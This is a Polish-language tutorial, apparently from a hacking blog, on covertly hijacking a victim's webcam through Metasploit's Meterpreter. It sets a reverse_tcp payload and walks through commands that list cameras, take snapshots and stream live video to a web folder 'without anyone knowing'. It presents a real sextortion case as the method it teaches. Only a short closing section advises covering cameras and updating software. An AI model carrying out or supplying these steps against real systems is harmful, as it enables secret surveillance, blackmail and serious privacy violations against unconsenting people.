w tym samouczku, przyjrzymy się, jak możemy włamać się do kamery potajemnie i zdalnie przez internet i spojrzeć na to, co dzieje się po drugiej stronie. Użyjemy potężnego Meterpretera i Kali Linux, by włamać się do kamery ofiary. Przejmiemy pełną kontrolę nad kamerą internetową, włączymy ją, uzyskamy migawki, a nawet będziemy przesyłać strumieniowo wideo na żywo, nikt się o tym nie dowie.
na początku 2014 roku haker został skazany na 18 miesięcy za to, że zrobił to dla Miss Teen USA 2013. Znalazł lukę w jej komputerze (jak jakieś przestarzałe oprogramowanie), zrobił kilka kompromitujących zdjęć z kamery internetowej i szantażował ofiarę, aby przesłała więcej zdjęć. Metoda, której użył, jest dokładnie tym, czego tutaj spróbujemy.
Nasz najlepszy przyjaciel meterpreter
pomoże nam w tym hakowaniu. Dzięki Meterpreter możemy kontrolować czyjąś kamerę internetową, zainstalować keylogger lub zainstalować własne wirusy, ukraść Prywatne Dane i zrobić prawie wszystko na komputerze ofiary.
w tym tutorialu zakładam, że użyłeś już modułu ataku, aby wykorzystać lukę za pomocą Metasploita (Jak to zrobić?). Przejdźmy do rzeczy.
jak włamać kamery internetowe?
Krok 1: Skonfiguruj meterpreter.
Po pomyślnym wykorzystaniu ofiary, mamy teraz możliwość ustawienia wybranego ładunku. Ładunek mówi metasploitowi, co ma zrobić na komputerze ofiary, gdy się włamie. Meterpreter to nasz ładunek. Poniższe polecenie ustawia nasz ładunek:
set payload windows/meterpreter/reverse_tcp
jeśli atak się powiódł, metasploit automatycznie zainstaluje meterpreter na docelowym systemie i możemy przejść do hakowania kamery internetowej.
Krok 2: Znajdź kamerę internetową.
Meterpreter posiada wbudowany moduł do wyszukiwania i sterowania kamerą zdalnego systemu. Możemy zacząć od Wyszukiwania, czy system ma w ogóle kamerę internetową lub not.me. poniższe polecenie służy do tego, zwraca nam również nazwę kamery internetowej.
meterpreter > webcam_list
i teraz powinieneś zobaczyć kamerę(y) swojego celu na wyjściu.
Krok 3: Zrób migawki
jeśli ostatnie polecenie dało nam kamerę internetową, możemy śmiało zrobić zdjęcie:
meterpreter > webcam_snap
i teraz powinieneś zobaczyć zdjęcie, które zostało zapisane w folderze/opt/framework3/msf3
po prostu udaj się tam
Krok 4: strumień wideo w czasie rzeczywistym z Zhakowanej Kamery
więc po prostu zrobiliśmy zdjęcie, zobaczmy, jak uzyskać strumień wideo na żywo. Możemy to zrobić wpisując poniższe polecenie: (Używamy –p
parametr, aby określić katalog, który chcemy dać do pliku strumieniowego wideo)
meterpreter > run webcam -p /var/www
To polecenie uruchamia kamerę internetową ofiary i wysyła jej wyjście wideo do /var/www/webcam.htm
. Możesz otworzyć ten plik i sprawdzić, co dzieje się na drugim końcu w strumieniu wideo na żywo.
jak zapobiec włamaniu się do własnej kamery internetowej?
istnieje kilka sposobów włamania się do kamer internetowych. W powyższym przykładzie, za pomocą kilku małych poleceń możemy zajrzeć do kamery naszej ofiary. Każdy doświadczony ekspert ds. bezpieczeństwa powie Ci, że żaden system nie jest całkowicie bezpieczny. Dlatego zawsze należy chronić kamery, gdy nie są używane. Osobiście używam tego małego gadżetu zarówno na moim laptopie, jak i smartfonie.
ale to nie znaczy, że nie powinieneś martwić się aktualizowaniem systemu operacyjnego i aplikacji, wręcz przeciwnie. Jeśli haker może przejąć kontrolę nad Twoją kamerą internetową, Twój system został z powodzeniem wykorzystany, jest teraz skutecznie botem, niewolnikiem atakującego. Oznacza to, że atakujący może zrobić wszystko w Twoim systemie: uzyskać dostęp do prywatnych danych, zobaczyć wszystko, co wpisujesz, a także wszystkie odwiedzane witryny.
z jakiego urządzenia teraz korzystasz? Smartfon? Laptop? Są szanse, że gapisz się bezpośrednio w kamerę. Czy nagle czujesz się trochę niespokojny? Powinieneś. Nie ryzykuj. Jeśli po prostu zakryjesz swoje kamery i rutynowo zaktualizujesz całe oprogramowanie, możesz uniknąć bycia ofiarą włamania do kamery.